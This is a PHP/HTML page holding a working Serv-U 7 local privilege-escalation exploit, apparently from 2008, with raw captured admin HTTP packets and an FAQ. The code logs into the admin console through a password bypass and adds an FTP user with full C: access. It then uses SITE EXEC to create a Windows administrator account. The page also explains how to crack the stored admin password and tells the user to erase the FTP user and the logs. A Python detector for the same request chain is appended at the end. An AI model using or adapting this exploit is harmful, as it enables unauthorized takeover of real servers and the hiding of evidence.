<?
/*
serv-u 7 local exp ver 1.0
www.inbreak.net
author [email protected] 2008-11-19
modify 2008-11-20

The following are the main packets, for everyone to study. If you rewrite this in ASP or another language, you can use them as a reference.
Global user list:
GET /Admin/XML/OrganizationUsers.xml&ID=161&sync=1227078625078&ForceList=1 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: 127.0.0.1:43958
Connection: Keep-Alive
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8
Global c:/RWADNELCRNI:
POST /Admin/XML/Result.xml?Command=AddObject&Object=CServer.0.DirAccess&Sync=1227081261640 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerDir.htm?Page=1
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:43958
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8
Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&
this user c:/RWADNELCRNI:
POST /Admin/XML/Result.xml?Command=AddObject&Object=CUser.618060.DirAccess&Sync=1227081437828 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:43958
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8
Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&
------------------------------Deficiencies---------------
I look forward to everyone improving this tool.
It depends too much on how the Serv-U environment is set up.
Please fill in here…
*/
?>
<html>
<title>Serv-u 7 local exp ver 1.0 by kxlzx</title>
<body>
<script>
function fun_showDiv(show)
{
document.getElementById(show).style.display="block";
}
</script>
<b>Serv-u 7 local exp ver 1.0 by kxlzx</b>
<form id="form1" name="form1" method="post" action="?">
<p><a href="#" onclick="fun_showDiv('adminpassdiv')">admin password</a>
<input type="text" name="admin_pwd" value="" />
</p>
<p>escalate privileges directly!
<input type="submit" name="cmd" value="right" />
<a href="#" onclick="fun_showDiv('QAdiv')">QA</a>
</p>
<pre>
<?
//Global var
$port=43958;
$host="127.0.0.1";
$sessionid="";
$getuserid="";
$ftpport=21;
$ftpuser="kxlzx_hacked";
$ftppwd=isset($_POST["admin_pwd"]) ? $_POST["admin_pwd"] : "";
$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";
$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser." /add";
if(isset($_POST["cmd"])) {
//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL="/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543";
$post_data_login["user"] = "";
$post_data_login["pword"] = $ftppwd;
$post_data_login["language"] = "zh%2CCN&";
$ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1280);
$sessionid = getmidstr("<sessionid>","</sessionid>",$result);
if ($sessionid!="")
echo "login successful!\r\n";
fclose($sock_login);//login-----------------------------------------
//getOrganizationId-------------------------------
$OrganizationId="";
$sock_OrganizationId = fsockopen($host, $port);
$URL="/Admin/ServerUsers.htm?Page=1";
$postStr = createRequest($port,$host,$URL,"",$sessionid,"");
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId="";
while(!feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1024);
$resultOrganizationId=$resultOrganizationId.$result;
}
$strTmp = "OrganizationUsers.xml&ID=";
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,'"'));
fclose($sock_OrganizationId);
if ($OrganizationId!="")
echo "get OrganizationId ".$OrganizationId." Success!\r\n";
//getOrganizationId-------------------------------
//getuserid---------------------------------------
$getuserid="";
$sock_getuserid = fsockopen($host, $port);
$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";
$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";
$post_data_getuserid="";
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1280);
$result = getmidstr('<var name="ObjectID" val="','" />',$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!="")
echo "get user ID ".$getuserid." Success!\r\n";
//getuserid---------------------------------------
//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";
$post_data_adduser["LoginID"] = $ftpuser;
$post_data_adduser["FullName"] = "";
$post_data_adduser["Password"] = "!";
$post_data_adduser["ComboPasswordType"] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";
$post_data_adduser["PasswordType"] = "0";
$post_data_adduser["ComboAdminType"] = "%E6%97%A0%E6%9D%83%E9%99%90";
$post_data_adduser["AdminType"] = "";
$post_data_adduser["ComboHomeDir"] = "/c:";
$post_data_adduser["HomeDir"] = "/c:";
$post_data_adduser["ComboType"] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";
$post_data_adduser["Type"] = "0";
$post_data_adduser["ExpiresOn"] = "0";
$post_data_adduser["ComboWebClientStartupMode"] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";
$post_data_adduser["WebClientStartupMode"] = "";
$post_data_adduser["LockInHomeDir"] = "0";
$post_data_adduser["Enabled"] = "1";
$post_data_adduser["AlwaysAllowLogin"] = "1";
$post_data_adduser["Description"] = "";
$post_data_adduser["IncludeRespCodesInMsgFiles"] = "";
$post_data_adduser["ComboSignOnMessageFilePath"] = "";
$post_data_adduser["SignOnMessageFilePath"] = "";
$post_data_adduser["SignOnMessage"] = "";
$post_data_adduser["SignOnMessageText"] = "";
$post_data_adduser["ComboLimitType"] = "%E8%BF%9E%E6%8E%A5";
$post_data_adduser["LimitType"] = "Connection";
$post_data_adduser["QuotaBytes"] = "0";
$post_data_adduser["Quota"] = "0";
$post_data_adduser["Access"] = "7999";
$post_data_adduser["MaxSize"] = "0";
$post_data_adduser["Dir"] = "%25HOME%25";
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_adduser, $postStr,strlen($postStr));
$result = fread($sock_adduser, 1280);
fclose($sock_adduser);
echo "Add User success!\r\n";
//adduser-----------------------------------------
//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";
$post_data_addpower["Access"] = "7999";
$post_data_addpower["MaxSize"] = "0";
$post_data_addpower["Dir"] = "/c:";
$post_data_addpower["undefined"] = "undefined";
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_addpower, $postStr,strlen($postStr));
$result = fread($sock_addpower, 1280);
fclose($sock_addpower);
echo "add the permissions success!\r\n";
//addpower-----------------------------------------
//exec-------------------------------
$sock_exec = fsockopen("127.0.0.1", $ftpport, $errno, $errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS !\r\n";//the user was created above with password "!"
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addUser."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "executing ".$exec_addUser."\r\nreturn: ".$recvbuf."\r\n";
$sendbuf = $exec_addGroup."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "executing ".$exec_addGroup."\r\nreturn: ".$recvbuf."\r\n";
fclose($sock_exec);
echo "well, your 3389 is up, clean up the ftp user and the logs right now!\r\n";
//exec-------------------------------
}
/** function createRequest
@author : kxlzx 2008-11-19
@port_post : administrator port $port=43958;
@host_post : host $host="127.0.0.1";
@URL_post : target $URL="/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543";
@post_data_post : arraylist $post_data["user"] = "";…
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string="";
if ($post_data_post!="")
{
$values=array();
foreach($post_data_post as $key=>$value)
{
$values[]="$key=".urlencode($value);
}
$data_string=implode("&",$values);
}
$request="";
$request.="POST ".$URL_post." HTTP/1.1\r\n";
$request.="Host: ".$host_post."\r\n";
$request.="Referer: ".$referer."\r\n";
$request.="Content-type: application/x-www-form-urlencoded\r\n";
$request.="Content-length: ".strlen($data_string)."\r\n";
$request.="User-Agent: Serv-U\r\n";
$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)\r\n";
$request.="Accept: */*\r\n";
$request.="Cache-Control: no-cache\r\n";
$request.="UA-CPU: x86\r\n";
$request.="Connection: close\r\n";//so the feof() read loop above terminates
if ($sessionid!="")
{
$request.="Cookie: Session=".$sessionid."\r\n";
}
$request.="\r\n";
$request.=$data_string."\r\n";
return $request;
}
//getMidfor2str copied from the internet
function getmidstr($L,$R,$str)
{
$int_l=strpos($str,$L);
$int_r=strpos($str,$R);
//strpos returns false (not -1) when the marker is absent
if ($int_l!==false && $int_r!==false)
{
$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
return $str_put;
}
else
return "did not find the required variables, 请联系[email protected]";
}
?>
</pre>
</form>
<div id="adminpassdiv" style="display:none">
<pre>
The default is empty; if the password is empty, <b>fill in nothing</b>.
If it has been changed, the administrator password is stored by default here:
<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>
Find the MD5 password value in that file.
C:\Program Files\RhinoSoft.com\Serv-U
is the Serv-U root directory.
The password value looks like this (assuming the password is 123456):
kx#######################
The # part represents the 32-character MD5 of 123456, and kx is the random 2-character string that Serv-U adds to strengthen its MD5 algorithm.
After cracking, the password comes out as <b>kx</b>123456; remove the kx and what remains is the password.
You can generate a dictionary for this encryption scheme.
author:kxlzx www.inbreak.net
</pre>
</div>
<div id="QAdiv" style="display:none">
<pre>
<b>1. How many ways are there to escalate privileges on Serv-U 7?</b>
There are two ways to escalate through Serv-U 7:
1>, log in to the administrator console page
==>get the OrganizationId needed to add a user
==>get the global user "next new user ID"
==>add a user
==>add permissions for that user, or add a global user permission
==>log in as the user
==>execute a system command to add a system account.
2>, log in to the administrator console page
==>basic web client
==>go to the Serv-U directory's "users" global user directory
==>upload a user file you have defined yourself
==>log in as the user
==>execute a system command to add a system account
This document uses the <b>first</b> method.
<b>2. What is the principle behind the escalation?</b>
The Serv-U 7 management platform runs over HTTP, which is very advanced.
Capturing and analysing the traffic, I found the following flaws that can be used:
1. When the administrator opens the web page from the management console, no password is required.
2. If the administrator opens the web page by URL, a password is asked for, but whatever you enter is accepted: "/?Session=39893&Language=zh,CN&LocalAdmin=1"
3. The administrator can add two kinds of users: global users and domain users. Permissions are likewise set at two levels: global and per user.
4. The packet that adds the user and the packet that sets its permissions are separate.
So I can capture the packets and convert them into PHP socket POSTs.
Finally, a classic FTP login and exec commands complete the escalation.
While writing the PHP I ran into many problems, such as functions I could not use, etc. -_-! I have not learned PHP; thanks to "cloud Shu cow" for the help.
Analysing the packet flow, I found that the server returns all of its data in XML, and the design of the data transfer is very classic.
Serv-U 7 also has its own database, and it generates its own IDs.
The ID is random: when you create a user, the client first asks the server to generate one, and once it has been generated it posts a modification of that ID with the user name, password, and so on.
It is like an insert in Oracle.
While writing the tool I ran into a lot of trouble, and the biggest trouble was this ID, which I worked out later.
Adding permissions also uses this ID.
So the tool connects to the server 6 times in total, as follows:
1. Log in to the platform, using the login page address that accepts any password. It returns a sessionid, which is used in all later packets.
2. Get the OrganizationId needed to add a user.
3. Request a user ID.
4. Modify that ID's login user name and password.
5. Modify that ID's permissions, adding write, delete, execute and so on for the C drive.
6. This connection does the dirty work: use the user just added to execute system commands.
<b>3. Why does it show success, but I am not escalated?</b>
That depends on the error codes; I am ashamed to say I did not write detailed error-code checking.
Generally there are the following situations:
1. The administrator password may be wrong.
See the admin password link.
2. The administrator may have restricted SITE EXEC.
The program needs to be modified to add a function that removes that restriction.
3. It may be a bug in the program.
<b>4. Why has the author not fixed so many issues?</b>
Don't you see? Once something is done to perfection, the matching defensive scheme comes out.
If it is imperfect, and they think this is all we have, the defensive side will think so too.
Don't believe it? After a while the defensive scheme will come out, and it will surely be: "modify SITE EXEC so it cannot be accessed."
When that time comes, I will write a function that changes it back.
So, once everyone has been escalated by XXXX, I will solve the XXXX problem. Everyone play with it this way first. :)
author:kxlzx www.inbreak.net
</pre>
</div>
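<p>Seen from the defender's side, the 6-connection flow described above leaves a recognisable trail in the admin console's HTTP requests. This is an added example, not part of the original tool: a small Python detector run over constructed access records (a made-up "client method path referer" layout, not Serv-U's real log format) that flags a client performing the LocalAdmin=1 login, the new-user ObjectID request and a DirAccess grant, in that order.</p>

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample, one request per line: "client method path referer".
# Made-up layout; paths mirror the requests shown on this page, IDs are
# invented, "-" means no Referer header.
SAMPLE_LOG = """\
10.0.0.5 GET /Admin/ServerUsers.htm?Page=1 -
10.0.0.5 POST /Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.161.User.4711&Sync=1 http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
10.0.0.9 POST /Web%20Client/Login.xml?Command=Login&Sync=2 http://127.0.0.1:43958/?Session=39893&Language=zh,CN&LocalAdmin=1
10.0.0.9 POST /Admin/XML/User.xml?Command=AddObject&Object=COrganization.161.User&Temp=1&Sync=3 http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
10.0.0.9 POST /Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.161.User.618060&Sync=4 http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
10.0.0.9 POST /Admin/XML/Result.xml?Command=AddObject&Object=CUser.618060.DirAccess&Sync=5 http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
"""

STAGES = ("localadmin_login", "new_user_id", "dir_access_grant")
LOCAL_ADMIN = re.compile(r"[?&]LocalAdmin=1(?:&|$)")
NEW_USER = re.compile(r"^COrganization\.\d+\.User$")
DIR_ACCESS = re.compile(r"^(?:CUser\.\d+|CServer\.0)\.DirAccess$")

def classify(path, referer):
    """Map one request to a stage of the chain above, or None."""
    url = urlsplit(path)
    q = {k: v[0] for k, v in parse_qs(url.query).items()}
    cmd, obj = q.get("Command"), q.get("Object", "")
    # Login reached via the LocalAdmin=1 URL that accepts any password.
    if url.path == "/Web%20Client/Login.xml" and cmd == "Login" and LOCAL_ADMIN.search(referer):
        return STAGES[0]
    # Server asked to mint an ObjectID for a new (temporary) user.
    if url.path == "/Admin/XML/User.xml" and cmd == "AddObject" and NEW_USER.match(obj):
        return STAGES[1]
    # Directory-access entry granted to a user or globally (CServer.0).
    if url.path == "/Admin/XML/Result.xml" and cmd == "AddObject" and DIR_ACCESS.match(obj):
        return STAGES[2]
    return None

def find_escalation_chains(log_text):
    """Return clients whose requests hit all three stages in order."""
    progress = defaultdict(int)  # client -> index of next expected stage
    flagged = []
    for line in log_text.splitlines():
        client, _method, path, referer = line.split(maxsplit=3)
        stage = classify(path, referer)
        nxt = progress[client]
        if nxt < len(STAGES) and stage == STAGES[nxt]:
            progress[client] += 1
            if progress[client] == len(STAGES):
                flagged.append(client)
    return flagged
```

The POST bodies (Access=7999, Dir=/c:) are not in access logs, so the rule keys on URL paths and query parameters only; a session id in the cookie would make a better correlation key than the client address where it is logged.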
</body>
</html>